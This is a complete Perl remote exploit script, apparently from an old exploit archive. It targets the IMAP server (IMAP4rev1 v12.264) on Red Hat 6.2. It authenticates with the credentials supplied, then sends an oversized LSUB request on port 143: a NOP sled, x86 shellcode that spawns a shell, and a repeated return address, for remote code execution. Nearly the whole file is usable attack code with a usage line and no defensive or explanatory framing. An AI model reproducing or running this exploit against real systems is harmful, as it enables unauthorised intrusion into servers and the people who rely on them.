#!/usr/bin/perl
# remote imapd exploit for Red Hat 6.2 (Zoot) by Zucco (zucco@netposta.net)
# thanks to Narr0w, dethy, SkyLaZarT.
# IMAP4rev1 v12.264
use IO::Socket;

if (!$ARGV[2]) {
  print "\n\tUsage: $0 <hostname> <username> <password> <offset>\n\n";
  exit;
}

$host = $ARGV[0];
$user = $ARGV[1];
$pass = $ARGV[2];
$offset = $ARGV[3];
$retaddr = "0xbffff2c8";

$ret = (hex $retaddr) + $offset;
$retreal = pack("l", $ret);

$nops = "\x90" x 613;
$shellcode = "\xeb\x35\x5e\x80\x46\x01\x30\x80\x46\x02\x30\x80\x46\x03\x30".
             "\x80\x46\x05\x30\x80\x46\x06\x30\x89\xf0\x89\x46\x08\x31\xc0".
             "\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56".
             "\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xc6\xff\xff\xff".
             "\x2f\x32\x39\x3e\x2f\x43\x38"; # shellcode by The Tekneeq Crew

$buffer .= $nops;
$buffer .= $shellcode;
$buffer .= $retreal x 96;

$sock = IO::Socket::INET->new( PeerAddr => "$host",
                               Proto    => "tcp",
			       PeerPort => "143");

print $sock "1 LOGIN $user $pass\r\n";
print $sock "1 LSUB \"\" {1064}\n";
print $sock "$buffer\r\n";